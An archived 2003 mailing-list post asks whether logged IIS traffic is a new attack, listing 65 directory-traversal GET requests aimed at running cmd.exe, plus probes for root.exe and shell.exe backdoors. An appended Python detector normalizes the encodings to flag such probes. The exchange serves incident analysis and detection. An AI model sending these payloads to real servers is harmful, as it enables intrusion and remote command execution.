
New attack or old Vulnerability Scanner?

From: Mark Embrich <mark_embrich(at)yahoo.com>
Date: Thu Apr 24 2003 - 19:43:43 EDT

Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs? Note that it also included: "User-Agent:.Mozilla/3.0. (compatible;.Indy.Library)...."
My googling tells me that this attack/scanner is probably built using the Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses. The first two were from a Comcast cable user. The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0. Scan TCP 80
1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3. GET./_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21. GET./msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23. GET./msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24. GET./MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25. GET./msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28. GET./msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29. GET./msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30. GET./msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31. GET./msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35. GET./PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36. GET./PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37. GET./PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38. GET./PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39. GET./Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40. GET./Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41. GET./Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42. GET./Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43. GET./samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46. GET./scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47. GET./scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48. GET./scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60. GET./scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61. GET./scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62. GET./scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63. GET./scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
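The GET list above is the classic set of IIS directory-traversal probes (Unicode %c0%af, double-decode %255c and %%35%63, overlong UTF-8) plus checks for the root.exe/shell.exe copies of cmd.exe left behind by earlier worms. As an added example (not code from the post), the detector below normalizes request paths the way the flawed decoder did, flags requests that reach those executables, and summarizes per source IP together with the Indy Library User-Agent; the log lines and client IPs are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes
# Constructed Apache-style log lines modelled on the requests in the post (hypothetical IPs).
SAMPLE_LOG = r'''
10.0.0.5 - - [24/Apr/2003:19:40:01 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
10.0.0.5 - - [24/Apr/2003:19:40:01 -0400] "GET /_vti_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
10.0.0.5 - - [24/Apr/2003:19:40:02 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
10.0.0.5 - - [24/Apr/2003:19:40:02 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.9 - - [24/Apr/2003:19:41:10 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$')
TARGETS = ('cmd.exe', 'root.exe', 'shell.exe')

def lenient_utf8(data: bytes) -> str:
    # UTF-8 decode that also accepts overlong forms (%c0%af -> '/', %c1%9c -> '\'), as the
    # flawed IIS decoder did; bytes that fit no form map 1:1 to code points.
    out, i = [], 0
    while i < len(data):
        ones = len(f'{data[i]:08b}'.split('0')[0])          # leading 1 bits = sequence length
        seq = data[i:i + ones] if 2 <= ones <= 6 else None
        if seq and len(seq) == ones and all(0x80 <= c < 0xC0 for c in seq[1:]):
            cp = seq[0] & (0x7F >> ones)
            for c in seq[1:]:
                cp = (cp << 6) | (c & 0x3F)
            out.append(chr(cp) if cp < 0xD800 or 0xDFFF < cp <= 0x10FFFF else '\ufffd')
            i += ones
        else:
            out.append(chr(data[i]))
            i += 1
    return ''.join(out)

def normalize_path(raw: str) -> str:
    # Re-decode until stable so %255c and %%35%63 collapse to '\' just as %5c does.
    path = raw
    for _ in range(3):                                      # enough for triple encoding
        path, prev = lenient_utf8(unquote_to_bytes(path)), path
        if path == prev:
            break
    return path.replace('\\', '/').lower()

def scan_log(text: str) -> dict:
    # Per source IP: probe requests by kind, and whether the Indy Library UA was seen.
    hits = {}
    for m in filter(None, map(LOG_RE.match, text.strip().splitlines())):
        norm = normalize_path(m['path'])
        if any(t in norm for t in TARGETS):
            h = hits.setdefault(m['ip'], {'labels': Counter(), 'indy': False})
            h['labels']['traversal-to-cmd' if '../' in norm else 'backdoor-probe'] += 1
            h['indy'] |= 'Indy Library' in m['ua']
    return hits
```

Running `scan_log(SAMPLE_LOG)` attributes all four probes to the single scanning host and leaves the ordinary request unflagged; in practice the per-IP count and the Indy Library UA together are the signature of this scanner burst.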
Received on Fri Apr 25 14:43:42 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:04 EDT

